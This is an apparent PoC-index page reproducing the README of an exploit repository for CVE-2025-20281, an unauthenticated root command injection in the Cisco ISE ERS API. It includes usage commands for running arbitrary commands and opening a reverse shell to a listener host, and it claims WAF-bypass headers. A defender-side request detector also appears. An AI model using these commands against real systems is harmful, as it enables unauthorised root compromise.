PoC details: 471a0aef8af35d866b84fc39e2827864013870c6

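Source
Related vulnerability
Title: Cisco ISE and Cisco ISE-PIC injection vulnerability (CVE-2025-20281)
Description: Cisco ISE and Cisco ISE-PIC are both products of the US company Cisco. Cisco ISE is a NAC solution used to manage the access of endpoints, users and devices to network resources in a zero-trust architecture. Cisco ISE-PIC is a component. Cisco ISE and Cisco ISE-PIC contain an injection vulnerability that stems from insufficient input validation and may lead to arbitrary code execution.
Description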
Unauthenticated Remote Code Execution exploit for CVE-2025-20281 in Cisco ISE ERS API. Execute commands or launch reverse shells as root — no authentication required.
Introduction
# CVE-2025-20281 — Cisco ISE ERS API Unauthenticated RCE Exploit

This repository contains a Python 3 proof-of-concept exploit for **CVE-2025-20281**, a critical vulnerability in **Cisco Identity Services Engine (ISE)** that allows **unauthenticated remote code execution (RCE) as root** via the ERS API.

---

## 🩻 Vulnerability Overview

> The Cisco ISE ERS `/ers/sdk#_` endpoint fails to validate authentication when processing user creation requests.  
> By injecting shell commands into the `name` parameter of the `InternalUser` object, attackers can achieve command execution as root.

- **CVE ID**: [CVE-2025-20281](https://nvd.nist.gov/vuln/detail/CVE-2025-20281)
- **Affected**: Cisco ISE PAN (Policy Admin Node) with ERS enabled
- **Severity**: Critical (CVSS 9.8)
- **Authentication**: None required
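
Seen from the defender's side, the two conditions in the overview (no authentication, shell syntax in `InternalUser.name`) can be checked on request data at a TLS-terminating proxy. The following is an added example, not code from this repository or from Cisco; the function names, the metacharacter set and the sample requests are assumptions constructed for illustration.

```python
import json
import re

# Assumption: characters with shell meaning that a legitimate account name
# should never contain. Tune this to your own naming policy.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n\r'\"]")

def inspect_ers_request(method, path, headers, body):
    """Return findings for one HTTP request as seen by a TLS-terminating proxy."""
    findings = []
    if not path.startswith("/ers/"):
        return findings
    # Header names are case-insensitive.
    if not any(k.lower() == "authorization" for k in headers):
        findings.append("unauthenticated request to ERS API")
    if method.upper() != "POST" or not body:
        return findings
    try:
        doc = json.loads(body)
    except ValueError:  # also covers UnicodeDecodeError
        findings.append("unparseable ERS request body")
        return findings
    user = doc.get("InternalUser") if isinstance(doc, dict) else None
    name = user.get("name") if isinstance(user, dict) else None
    if name is None:
        return findings
    if not isinstance(name, str):
        findings.append("InternalUser.name is not a string")
    elif SHELL_META.search(name):
        findings.append("shell metacharacter in InternalUser.name")
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "/ers/config/internaluser", {"Authorization": "Basic <redacted>"},
     b'{"InternalUser": {"name": "jsmith"}}'),
    ("POST", "/ers/sdk#_", {"Content-Type": "application/json"},
     b'{"InternalUser": {"name": "x; id"}}'),
    ("GET", "/admin/", {}, b""),
]

def scan(samples=SAMPLES):
    """Inspect every sample and return one findings list per request."""
    return [inspect_ers_request(*s) for s in samples]

if __name__ == "__main__":
    for sample, findings in zip(SAMPLES, scan()):
        print(sample[0], sample[1], findings)
```

Either finding on its own is worth an alert on a PAN that exposes ERS; both together on one request match the pattern the overview describes.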

---

## ⚙️ Features

- ✅ Run arbitrary commands (`--cmd`)
- ✅ Quick test with `--whoami`
- ✅ Launch reverse shells (`--reverse`)
- ✅ No authentication or session token required
- ✅ SSL warning suppression and clean output
- ✅ Legitimate headers to bypass simple WAFs

---

## 🚀 Usage

```bash
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
```

### Examples

Test command:

```bash
python3 CVE-2025-20281.py 192.168.1.10 --whoami
```

Run custom command:

```bash
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
```

Reverse shell:

```bash
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
```

---

## ⚠️ Legal Disclaimer

This code is provided for educational and authorized testing purposes only.
Do not use this software against networks or systems you do not own or have permission to test.

---

## 🙏 Credits

Vulnerability: Disclosed via Cisco advisory

PoC Refactor: illdeed

File snapshot

```
[4.0K] /data/pocs/471a0aef8af35d866b84fc39e2827864013870c6
├── [2.2K] CVE-2025-20281.py
├── [1.0K] LICENSE
└── [1.7K] README.md

0 directories, 3 files
```